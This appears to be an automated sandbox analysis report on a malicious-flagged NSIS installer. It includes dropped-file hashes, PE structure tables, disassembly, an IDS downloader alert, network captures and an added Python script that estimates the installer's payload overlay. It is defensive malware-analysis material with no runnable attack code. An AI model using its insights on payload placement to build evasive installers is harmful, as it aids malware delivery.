                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                          Process:C:\Users\user\Desktop\YrCSUX2O3I.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):457562
                                                          Entropy (8bit):1.2482312628496608
                                                          Encrypted:false
                                                          SSDEEP:1536:2jMpNhAlrasgHvP3V5s9ASYucRtPbRS9y:hpNhX93V5sOSTczjB
                                                          MD5:E4AC954ED484155B2A165BF00B1E8A4F
                                                          SHA1:21ACBAC21538E0258892381807BBE19524DA02E3
                                                          SHA-256:3078C30C80C29C473A796C4E1FE5F89A175D9B23FC88DBCD0262D93B0C67BEED
                                                          SHA-512:A63E484A5CF926E2484B69210BE047B1F90DAC2A0F813E33D2F1B507CC45AF21169AEC9EBEAA6152CDB2448BEE7B09D82E4427C7596E864B09A7A15560D323AC
                                                          Malicious:false
                                                          Preview:.......v......... ....:...........r.........................V.......l...Z...^.....................q........................l.........d.c............................................................Y.........................7.....................................o.....................T.................................T...................................n..............................................................g.3......................................................o.....................................X..0.....................................................:..........................Z?..........................s........O........>.................._.................................P.................................................$.................M.....................1........-..............................................I...........(..............................................................m..............-................................................o.....................
                                                          Process:C:\Users\user\Desktop\YrCSUX2O3I.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):327732
                                                          Entropy (8bit):1.2609335393847756
                                                          Encrypted:false
                                                          SSDEEP:768:rbmwczlydY1vPDT6+VOPnd7avS0bYT7bUkf0+VNt8xT70sob8aN/qfizqd71OFNj:sQdCVXhCo3Vxd/SRgV133ZBLlo
                                                          MD5:622032628F068FE10CC2E51D0502CC9A
                                                          SHA1:5AE897F10B51533C20489B755F4395FCED7EB67C
                                                          SHA-256:840F31C02A7A8CA755C4CD53619D9F93BB42848DD334B25A0A3C72B13F5753F4
                                                          SHA-512:2E5C98D7E3FE856D22381B2B97BAC5DF50C82859CB62DCF1D2FE3386B79D96446887FECB59D43F924200532399307E3846DDECA33FB87A286ADD5E6CEFC10637
                                                          Malicious:false
                                                          Preview:.).............\....................).....................q............A.....c..................................[..,........................(...................................................................}...................................................^................`.................................%.............................................................................L....................~d...............N..........................................h......~.............................~.........B...................Z....0..........................q................................v.......................................k............Y.............................................|..................................................................1.................T......................................................................................................................k........................................D...-.V..z...'........................................
                                                          Process:C:\Users\user\Desktop\YrCSUX2O3I.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):433848
                                                          Entropy (8bit):1.255481788885247
                                                          Encrypted:false
                                                          SSDEEP:768:8agBmxdiio94Vue1rGruEhQHTvyGPHzfrm75zidpc8oUH392slzddIRzyP98UmYu:NgKjnn/NnW5hQAPAfMqoDH+bI
                                                          MD5:7586252625434A405256063977B84D0D
                                                          SHA1:BA800F4510A4940F6EA11F866E3F4AF9805BDFD4
                                                          SHA-256:5AFA5BC29281632F196999E16D8F4B26F2C14EC6A8A5F589DC5932B6DE78A2A7
                                                          SHA-512:613E03C6EC8DFBE0B2B6A450B30B932157FE40121E6A7E4AE9FB188193AB6E5D3CA044F30351A3E969FD84BAC8BC7AD2B7DD5E9D0BB091FEDE0546CC9E3A3856
                                                          Malicious:false
                                                          Preview:...............1.............L..................................................................3...............................m...............................................................................................y...........n.................A................G...........$............................m.........................X..............................................................................5.....G.............^....................................\........v.....................-......................................................."............................V........0....................G.........................................................................................................#.....B...............V.....................x............U......................T................................>.................w..............;.....................................L.....................................................................y,.................
                                                          Process:C:\Users\user\Desktop\YrCSUX2O3I.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):327124
                                                          Entropy (8bit):1.2472891497347776
                                                          Encrypted:false
                                                          SSDEEP:768:qw1bcEnP59OCTltLumdIdNK2mkVYYHN44jjU5S6EP1KRuM/VTCo0oXATL4bYZcOO:jucypY8Gyju3O4/iALDvWJTAnjPqqaO
                                                          MD5:0EC84A842970A2C0B04893F66217F733
                                                          SHA1:E100ACDACE598C27B00E0AF658306942A70228FC
                                                          SHA-256:6B3552FC5295BE3AE9FADD8AFA8A06103BD60DDB6E0BE924C61B346895505A7A
                                                          SHA-512:27270395859FEF2B270B7C2C70FA587BAF4FDCFF742DA93B6F7D1B0B82B5B1FF0BA9004BD3B825A9A62FAE75FB0F792A176ECE980529B61A2FEADE958B8B0BFB
                                                          Malicious:false
                                                          Preview:................:............................q......................[.................c.....................................{.... ..................................K....U............4.........................................@.........................................................\...............e...........................3................J.........L*....................................................................................(.......@..........................................................................g....................4.............................b.......2...............................p.....t.......................4\.................&......d...........................................................................................k......k........................................................................................................................................................................................\....................................0........M
                                                          Process:C:\Users\user\Desktop\YrCSUX2O3I.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):324744
                                                          Entropy (8bit):7.708227271496816
                                                          Encrypted:false
                                                          SSDEEP:6144:jk+3s9V9YuDKUL6x6b1v0V2MIruRc7bMJ//rMsOAq12ZeWbI1:jkNY2KUicv0tARMJQsOAw
                                                          MD5:F62EAE8CE9F6C249DC71B48D0D0719B9
                                                          SHA1:A1A29C8B7FDE15F7EFF8555D87191094E12D77AD
                                                          SHA-256:BEFC15D7D141B2D2193D73DA595FC799FE704617C134C50F744F666ED24F76AB
                                                          SHA-512:40DB79BE81CBCB79867F8C8147C7ECECF0604A729C030B2A636F8C0DF27D1297A9DF93D9F862009FA2FD0A24D198114842BF645D741D2272F5928B3097FD9983
                                                          Malicious:false
                                                          Preview:.......uuuu........=.....WWWWW.........F..&..........hhhh..................__...................m.......zzz.............................,,.........I..n...........................kkk..............2222222... ...........................%%%%%..aa.!!.....G.........[......QQ.......m.G..................................B....I........)).......l...................l....%%.LLLL..............y.L...<<.....`.......#........T...............KK.,,,,............a.....77......................................................".......6......MMM......N...........\......s.;;....n.............................w..... ...VV.....,.....I.........m.==........ooo.I....9.U............................|........... ...{.HH....dd....||.............??...............................:...........SSS.....hh....h.......---...^..rr....................................JJJ.............22....EEE............x.............D.......+......==...........88.............oooooo......l................S..................222.....mm........)..3..
                                                          Process:C:\Users\user\Desktop\YrCSUX2O3I.exe
                                                          File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0, imaginary
                                                          Category:dropped
                                                          Size (bytes):462783
                                                          Entropy (8bit):1.2514895750557933
                                                          Encrypted:false
                                                          SSDEEP:1536:gR0px6Iw5kvIV8FuWk8mGWwi1BoFIN8oYd:jmIwavC6utxgIjYd
                                                          MD5:77218C2134D28A666F2FDEAA5E452489
                                                          SHA1:16E2234D9C2F4E4265D1362887B40149B9E31823
                                                          SHA-256:A901A3525DC18A4A9E6EF655931252D8258D954D419FCE81668F251C8EF54EE5
                                                          SHA-512:AFE9F39C392A6DE29B551393CB032534D04AA18B82E747406A23828DE7B4088FBA3045F0DD8ECC37C3A4FE45125605C0504EA8A1C38DA429624A35753E8E3ED2
                                                          Malicious:false
                                                          Preview:....................]l................pq......................................................................................................p..........................................&...........................................................................].................v.................,.............................................................*.........................+........2.............................GI=..............,............................I............to....{........................8...........f..........XF.........O.............................................................].................-....................+........................2...........................B......................m.....^......................................................................................z....;.........x.....................................................................................................................4.............6...6............s.................
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                          Entropy (8bit):7.570387112382367
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:YrCSUX2O3I.exe
                                                          File size:1'069'784 bytes
                                                          MD5:13dccf3d94c8435353a3bf886ca19e7e
                                                          SHA1:52474b83a6ea7cf75d1d4986b32e26d87b7074eb
                                                          SHA256:d15433cca1e4b6695379317ef0650e4cf9f07fcd5317b8d84343465f3d9186d8
                                                          SHA512:6f98fff35a5643660aecd83abcc9253659c90b3057b8678c999c13a9dbbdb691847bade8a0760f4ece647086c427ec44d7a4aec27ae2649367ad89b08e056ca2
                                                          SSDEEP:24576:Cj+EenCKbbn+vG0zZpwmNG3Ap137dboaPjyMi76Kby:2+7CKbb+vG0V6t3IRM+i763
                                                          TLSH:BA3523523690904ED8B55A36DA1BD53D4839EE1CEC900B0367943F8F793A6D2BC7928F
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....e.Q.................b...........1............@
                                                          Icon Hash:0d4f7fd151493b07
                                                          Entrypoint:0x4031dd
                                                          Entrypoint Section:.text
                                                          Digitally signed:true
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x519965E1 [Sun May 19 23:53:05 2013 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:7fd61eafe142870d6d0380163804a642
                                                          Signature Valid:false
                                                          Signature Issuer:CN=Hjertekamret, O=Hjertekamret, L=Glen, C=US
                                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                          Error Number:-2146762487
                                                          Not Before, Not After
                                                          • 07/02/2024 09:50:23 06/02/2027 09:50:23
                                                          Subject Chain
                                                          • CN=Hjertekamret, O=Hjertekamret, L=Glen, C=US
                                                          Version:3
                                                          Thumbprint MD5:108C4654F891FC9B117C8F6C328C22B7
                                                          Thumbprint SHA-1:8667A216D1553E591D1C626D7789CEC7AF7DF569
                                                          Thumbprint SHA-256:15CCC1C60C75757EAF7411D5B752DE7E146D3AA3E52E7D308152023C8251C582
                                                          Serial:47B3C151C2CAF5A93B7F5076B707BD8C3B1142E8
                                                          Instruction
                                                          sub esp, 000002D4h
                                                          push ebx
                                                          push ebp
                                                          push esi
                                                          push edi
                                                          push 00000020h
                                                          xor ebp, ebp
                                                          pop esi
                                                          mov dword ptr [esp+18h], ebp
                                                          mov dword ptr [esp+10h], 0040A2D8h
                                                          mov dword ptr [esp+14h], ebp
                                                          call dword ptr [00408034h]
                                                          push 00008001h
                                                          call dword ptr [00408134h]
                                                          push ebp
                                                          call dword ptr [004082ACh]
                                                          push 00000008h
                                                          mov dword ptr [00434F58h], eax
                                                          call 00007F61EC8A62D5h
                                                          mov dword ptr [00434EA4h], eax
                                                          push ebp
                                                          lea eax, dword ptr [esp+34h]
                                                          push 000002B4h
                                                          push eax
                                                          push ebp
                                                          push 0042B1B8h
                                                          call dword ptr [0040817Ch]
                                                          push 0040A2C0h
                                                          push 00433EA0h
                                                          call 00007F61EC8A5F40h
                                                          call dword ptr [00408138h]
                                                          mov ebx, 0043F000h
                                                          push eax
                                                          push ebx
                                                          call 00007F61EC8A5F2Eh
                                                          push ebp
                                                          call dword ptr [0040810Ch]
                                                          cmp word ptr [0043F000h], 0022h
                                                          mov dword ptr [00434EA0h], eax
                                                          mov eax, ebx
                                                          jne 00007F61EC8A344Ah
                                                          push 00000022h
                                                          mov eax, 0043F002h
                                                          pop esi
                                                          push esi
                                                          push eax
                                                          call 00007F61EC8A599Ch
                                                          push eax
                                                          call dword ptr [00408240h]
                                                          mov dword ptr [esp+1Ch], eax
                                                          jmp 00007F61EC8A3509h
                                                          push 00000020h
                                                          pop edx
                                                          cmp cx, dx
                                                          jne 00007F61EC8A3449h
                                                          inc eax
                                                          inc eax
                                                          cmp word ptr [eax], dx
                                                          je 00007F61EC8A343Bh
                                                          add word ptr [eax], 0000h
                                                          Programming Language:
                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                          Name | Virtual Address | Virtual Size | Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x85a0 | 0xb4 | .rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x55000 | 0x2eba8 | .rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1049d8 | 0x900 |
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b8 | .rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections (Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics)
.text | 0x1000 | 0x6010 | 0x6200 | c51ae685760de510818d22f29d66b8b0 | False | 0.6646603954081632 | data | 6.440168137798694 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1460 | 0x1600 | 24345ed7377f4b4663284282b5ef48b3 | False | 0.42134232954545453 | data | 4.947177345443015 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x2af98 | 0x600 | dc268be7d1af6fdfcd38d44492cfdaf5 | False | 0.486328125 | data | 3.791234740340295 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x35000 | 0x20000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x55000 | 0x2eba8 | 0x2ec00 | bdebbd0274fda95ee828978bf6f6217f | False | 0.3979413853609626 | data | 3.9167771947187013 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
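The two tables above can be cross-checked by hand, but the relationship between them is easier to see in code. The following is an added example (not part of the Joe Sandbox report and not code from the sample): it takes the section table and the non-empty data-directory entries exactly as printed, reproduces the report's "Is in Section" column, and then estimates how much data sits after the last section. The SECURITY directory's address is a raw file offset, so the gap between the end of the sections and 0x1049d8 is the overlay where an installer stub of this shape keeps its payload (the .ndata section name is the one used by NSIS stubs). The report lists raw sizes but not each section's PointerToRawData, so the assumption that the first section starts at file offset 0x400 and that sections are contiguous is flagged in the code; adjust it if the real header size differs.

```python
"""Map PE data directories to sections and estimate the overlay size.

Added example; not from the Joe Sandbox report or the analysed sample.
All addresses and sizes below are copied from the section and
data-directory tables of the report.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Section:
    name: str
    rva: int        # VirtualAddress
    vsize: int      # VirtualSize
    rawsize: int    # SizeOfRawData


# Section table as printed in the report.
SECTIONS: List[Section] = [
    Section(".text",  0x1000,  0x6010,  0x6200),
    Section(".rdata", 0x8000,  0x1460,  0x1600),
    Section(".data",  0xa000,  0x2af98, 0x600),
    Section(".ndata", 0x35000, 0x20000, 0x0),
    Section(".rsrc",  0x55000, 0x2eba8, 0x2ec00),
]

# Non-empty data directories from the report: name -> (address, size).
# SECURITY's address is a file offset, every other entry is an RVA.
DIRECTORIES: Dict[str, Tuple[int, int]] = {
    "IMPORT":   (0x85a0,   0xb4),
    "RESOURCE": (0x55000,  0x2eba8),
    "SECURITY": (0x1049d8, 0x900),
    "IAT":      (0x8000,   0x2b8),
}


def section_for_rva(rva: int, sections: List[Section] = SECTIONS) -> Optional[str]:
    """Name of the section whose virtual range contains rva, else None."""
    for s in sections:
        # A section with VirtualSize 0 covers no addresses at all.
        if s.vsize and s.rva <= rva < s.rva + s.vsize:
            return s.name
    return None


def directory_sections(dirs: Dict[str, Tuple[int, int]] = DIRECTORIES,
                       sections: List[Section] = SECTIONS) -> Dict[str, Optional[str]]:
    """Reproduce the report's 'Is in Section' column.

    SECURITY is never resolved through the section table because its
    address is not an RVA.
    """
    return {
        name: (None if name == "SECURITY" else section_for_rva(addr, sections))
        for name, (addr, _size) in dirs.items()
    }


def end_of_sections(sections: List[Section] = SECTIONS,
                    first_raw_offset: int = 0x400) -> int:
    """File offset just past the raw data of the last section.

    ASSUMPTION: the report does not print PointerToRawData, so the first
    section is taken to start at 0x400 (a common value for a 0x200-aligned
    header) and sections are assumed to be laid out back to back.
    """
    return first_raw_offset + sum(s.rawsize for s in sections)


def overlay_size(dirs: Dict[str, Tuple[int, int]] = DIRECTORIES,
                 sections: List[Section] = SECTIONS,
                 first_raw_offset: int = 0x400) -> int:
    """Bytes between the end of the sections and the certificate table."""
    cert_offset, _ = dirs["SECURITY"]
    return cert_offset - end_of_sections(sections, first_raw_offset)


def expected_file_size(dirs: Dict[str, Tuple[int, int]] = DIRECTORIES) -> int:
    """The Authenticode blob is normally the last thing in a signed PE."""
    cert_offset, cert_size = dirs["SECURITY"]
    return cert_offset + cert_size


if __name__ == "__main__":
    for name, sec in directory_sections().items():
        print(f"{name:9s} -> {sec}")
    print(f"sections end at   0x{end_of_sections():x}")
    print(f"overlay size      0x{overlay_size():x} ({overlay_size()} bytes)")
    print(f"expected file size 0x{expected_file_size():x}")
```

With the report's numbers the sections end at 0x36e00, so roughly 0xcdbd8 bytes (about 823 KiB) sit in the overlay before the signature, far more than the five sections hold together; that overlay, not the sections, is where the interesting content of this file lives, and a section-only entropy check would miss it.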
Resources (Name | RVA | Size | Type | Language | Country | ZLIB Complexity)
RT_ICON | 0x55388 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.364929610789069
RT_ICON | 0x65bb0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.403011351692243
RT_ICON | 0x6f058 | 0x67e8 | Device independent bitmap graphic, 80 x 160 x 32, image size 26560 | English | United States | 0.4087218045112782
RT_ICON | 0x75840 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.4187615526802218
RT_ICON | 0x7acc8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.40298771846953235
RT_ICON | 0x7eef0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.4413900414937759
RT_ICON | 0x81498 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4702157598499062
RT_ICON | 0x82540 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5204918032786885
RT_ICON | 0x82ec8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5824468085106383
RT_DIALOG | 0x83330 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x83430 | 0x11c | data | English | United States | 0.6091549295774648
RT_DIALOG | 0x83550 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x83618 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x83678 | 0x84 | data | English | United States | 0.7272727272727273
RT_VERSION | 0x83700 | 0x1d8 | data | English | United States | 0.5317796610169492
RT_MANIFEST | 0x838d8 | 0x2cb | XML 1.0 document, ASCII text, with very long lines (715), with no line terminators | English | United States | 0.5664335664335665
Imports (DLL: imported functions)
KERNEL32.dll: CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, SetFileAttributesW, ExpandEnvironmentStringsW, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, SetErrorMode, GetCommandLineW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, MultiByteToWideChar, FindClose, MulDiv, ReadFile, WriteFile, lstrlenA, WideCharToMultiByte
USER32.dll: EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll: SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll: SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll: RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll: ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll: CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll: GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken
English | United States
IDS alerts (Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol)
2025-01-11T01:30:44.581109+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 49974 | 142.250.184.206 | 443 | TCP
TCP packets (Timestamp | Source Port | Dest Port | Source IP | Dest IP)
Jan 11, 2025 01:30:43.524843931 CET | 49974 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:30:43.524899960 CET | 443 | 49974 | 142.250.184.206 | 192.168.2.9
Jan 11, 2025 01:30:43.524976015 CET | 49974 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:30:43.537203074 CET | 49974 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:30:43.537225008 CET | 443 | 49974 | 142.250.184.206 | 192.168.2.9
Jan 11, 2025 01:30:44.197601080 CET | 443 | 49974 | 142.250.184.206 | 192.168.2.9
Jan 11, 2025 01:30:44.197734118 CET | 49974 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:30:44.198376894 CET | 443 | 49974 | 142.250.184.206 | 192.168.2.9
Jan 11, 2025 01:30:44.198528051 CET | 49974 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:30:44.245713949 CET | 49974 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:30:44.245762110 CET | 443 | 49974 | 142.250.184.206 | 192.168.2.9
Jan 11, 2025 01:30:44.246149063 CET | 443 | 49974 | 142.250.184.206 | 192.168.2.9
Jan 11, 2025 01:30:44.246329069 CET | 49974 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:30:44.249538898 CET | 49974 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:30:44.291338921 CET | 443 | 49974 | 142.250.184.206 | 192.168.2.9
Jan 11, 2025 01:30:44.581106901 CET | 443 | 49974 | 142.250.184.206 | 192.168.2.9
Jan 11, 2025 01:30:44.581195116 CET | 49974 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:30:44.581249952 CET | 443 | 49974 | 142.250.184.206 | 192.168.2.9
Jan 11, 2025 01:30:44.581378937 CET | 49974 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:30:44.581378937 CET | 49974 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:30:44.581432104 CET | 443 | 49974 | 142.250.184.206 | 192.168.2.9
Jan 11, 2025 01:30:44.581485987 CET | 49974 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:30:44.624800920 CET | 49975 | 443 | 192.168.2.9 | 142.250.181.225
Jan 11, 2025 01:30:44.624852896 CET | 443 | 49975 | 142.250.181.225 | 192.168.2.9
Jan 11, 2025 01:30:44.625035048 CET | 49975 | 443 | 192.168.2.9 | 142.250.181.225
Jan 11, 2025 01:30:44.625411987 CET | 49975 | 443 | 192.168.2.9 | 142.250.181.225
Jan 11, 2025 01:30:44.625432968 CET | 443 | 49975 | 142.250.181.225 | 192.168.2.9
Jan 11, 2025 01:30:45.279053926 CET | 443 | 49975 | 142.250.181.225 | 192.168.2.9
Jan 11, 2025 01:30:45.279165030 CET | 49975 | 443 | 192.168.2.9 | 142.250.181.225
Jan 11, 2025 01:30:45.283005953 CET | 49975 | 443 | 192.168.2.9 | 142.250.181.225
Jan 11, 2025 01:30:45.283021927 CET | 443 | 49975 | 142.250.181.225 | 192.168.2.9
Jan 11, 2025 01:30:45.283363104 CET | 443 | 49975 | 142.250.181.225 | 192.168.2.9
Jan 11, 2025 01:30:45.283428907 CET | 49975 | 443 | 192.168.2.9 | 142.250.181.225
Jan 11, 2025 01:30:45.284204006 CET | 49975 | 443 | 192.168.2.9 | 142.250.181.225
Jan 11, 2025 01:30:45.327342987 CET | 443 | 49975 | 142.250.181.225 | 192.168.2.9
Jan 11, 2025 01:30:45.689820051 CET | 443 | 49975 | 142.250.181.225 | 192.168.2.9
Jan 11, 2025 01:30:45.689872980 CET | 443 | 49975 | 142.250.181.225 | 192.168.2.9
Jan 11, 2025 01:30:45.689922094 CET | 49975 | 443 | 192.168.2.9 | 142.250.181.225
Jan 11, 2025 01:30:45.689961910 CET | 443 | 49975 | 142.250.181.225 | 192.168.2.9
Jan 11, 2025 01:30:45.689985991 CET | 49975 | 443 | 192.168.2.9 | 142.250.181.225
Jan 11, 2025 01:30:45.690006018 CET | 49975 | 443 | 192.168.2.9 | 142.250.181.225
Jan 11, 2025 01:30:45.690017939 CET | 443 | 49975 | 142.250.181.225 | 192.168.2.9
Jan 11, 2025 01:30:45.690054893 CET | 49975 | 443 | 192.168.2.9 | 142.250.181.225
Jan 11, 2025 01:30:45.690064907 CET | 443 | 49975 | 142.250.181.225 | 192.168.2.9
Jan 11, 2025 01:30:45.690104961 CET | 49975 | 443 | 192.168.2.9 | 142.250.181.225
Jan 11, 2025 01:30:45.715065956 CET | 49975 | 443 | 192.168.2.9 | 142.250.181.225
Jan 11, 2025 01:30:45.715105057 CET | 443 | 49975 | 142.250.181.225 | 192.168.2.9
Jan 11, 2025 01:30:45.830571890 CET | 49976 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:30:45.830621004 CET | 443 | 49976 | 142.250.184.206 | 192.168.2.9
Jan 11, 2025 01:30:45.830713034 CET | 49976 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:30:45.830935955 CET | 49976 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:30:45.830951929 CET | 443 | 49976 | 142.250.184.206 | 192.168.2.9
Jan 11, 2025 01:30:46.471642017 CET | 443 | 49976 | 142.250.184.206 | 192.168.2.9
